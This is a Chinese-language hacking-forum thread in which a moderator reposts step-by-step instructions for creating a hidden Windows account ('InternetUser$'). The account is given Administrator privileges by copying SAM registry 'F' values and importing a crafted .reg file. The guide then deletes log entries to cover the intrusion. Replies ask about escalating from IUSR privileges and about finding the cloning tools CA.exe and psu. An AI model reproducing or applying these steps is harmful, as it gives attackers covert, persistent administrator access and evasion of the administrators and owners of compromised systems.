|
 | 作者: bking [bking]
 版主 |
登录 |
| 转 先建立一个用户: InternetUser$ c:\>net user InternetUser$ password123 /add //后面加$ 是为了使在 控制台下用 net user 看不到. 然后运行regedt32.exe(注意不是regedit.exe) 先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组, 把"权限"->"完全控制"->"允许"打上勾,然后确定. (比如刚才我们用guest登录,但它已经是administrators组的了,因此需要把ADMINISTRATORS组的也改为允许 完全控制,而且下面的键,Domains,account,user都要逐级这样做.但如果前面没有更改guest用户的默认组,这 里就没必要这么麻烦,一级一级的了)这样就可以直接读取本地sam的信息 现在运行regedit.exe 打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\InternetUser$ 查看默认键值为"0x3f1" 相应导出如下 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\ASPNET$ 为InternetUser$.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键) 用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下 "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\ 00,00,00,00,00,00,00 把其复制后,打开3f1.reg,找到"F"的值,将其删除,然后把上面的那段粘贴. 打开aspnet$.reg,把里面的内容,比如这个例子中如下面这段复制 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$] @=hex(3f1): 回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1] "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\ 00,00,00,00,00,00,00 "V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\ 00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\ 14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\ 01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\ 00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\ 00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\ 08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\ 00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\ 00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\ 00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\ 00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\ 00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\ 00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\ 00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\ 00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\ e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\ 00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\ 00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\ 4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\ 76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\ ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\ fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\ 37,f1,02,cf,01,00,01,00,01,00,01,00 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$] @=hex(3f1): 保存后,将InternetUser$用户删除 c:\>net user InternetUser$ /delete 运行regedit.exe 将我们已经修改好的3f1.reg文件导入. 最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 删除刚才 添加的用户(比如刚才刚才是用的guest,而且改了Administrators组的设置,所以与前面对应,Administratos 组也要改,而且SAM下面的键,Domains,account,user都要逐级这样做,但如果前面没有改guest用户的默认组, 这里没必要这么麻烦,一级一级的了). 这样,我们就建立了一个在控制台用 net user 和"计算机管理"中都看不到的帐户InternetUser$,但是不能改 密码,一改密码就会在"计算机管理"中看到.需要注意的一点是,每次登录(不论是不是克隆的),都最好注销掉, 而不是直接关闭窗口,否则在"终端服务管理器"中会看到,而且管理员登录后注销时,可能会发现一个问题就是 ,怎么会是"注销InternetUser$..."!!! (我克隆了两个帐号,测试的,没有测试过Administrators) 然后是记录清理,由于整个过程有下载的过程被记录,因此,运行logfiles,删除相关文件中的记录即可. |
| 地主 发表时间: 04/24 20:18 |
 | 回复: raining [raining]  论坛用户 |
登录 |
|
克隆帐号有什么用? |
| B1层 发表时间: 04/24 22:03 |
 | 回复: magic [buaaytt]  论坛用户 |
登录 |
|
说说怎么提升权限的问题吧 比如我通过U漏洞得到了iusr_machinename的权限 如何可以得到管理员权限 或者有其他非管理员权限怎么可以得到管理员权限 |
| B2层 发表时间: 04/24 22:06 |
| 回复: -- [iwbah_hz] 论坛用户 |
登录 |
|
哎!我太菜了!每看一篇文章满脑子都是问好。请大家谅解! 先问一下克隆的定义,如果我把一帐号克隆成管理员的了,比如IUSER_MACHINENAME,那是不是有两个这个帐号那?一个是你的克隆,一个是原来的? 再问一下方法的问题,看了上面的文章,先在自己的机器上试试,我的机器是2kpro的,没有regedit32呀,以下的事就不能做了。是不是上面的方法只适用于2kserver那,如果是有没有使用2kpro的, 再问个软件的问题,不好意思,我搜索了半天也没有下到CA.exe。 拜托,谁那有 请大家不要见笑呀 |
| B3层 发表时间: 05/10 12:14 |
| 回复: BearKing [bking] 版主 |
登录 |
|
克隆帐号是指克隆某个帐号的权限,而帐号本身的名字是不会变的,更不会生成另一个帐号。 |
| B4层 发表时间: 05/10 12:46 |
| 回复: mytear [mytear]  论坛用户 |
登录 |
|
我也是没有找到那个ca.exe,谁知道那有请告诉我,谢谢!!!!!!!!!!! |
| B5层 发表时间: 05/10 14:52 |
 | 回复: laievf [laievf] 论坛用户 |
登录 |
|
不用psu就可以???? |
| B6层 发表时间: 05/10 18:56 |
| 回复: BearKing [bking] 版主 |
登录 |
|
psu只是克隆帐号的其中一种方法。 |
| B7层 发表时间: 05/10 20:52 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 不用工具克隆帐号的方法(转)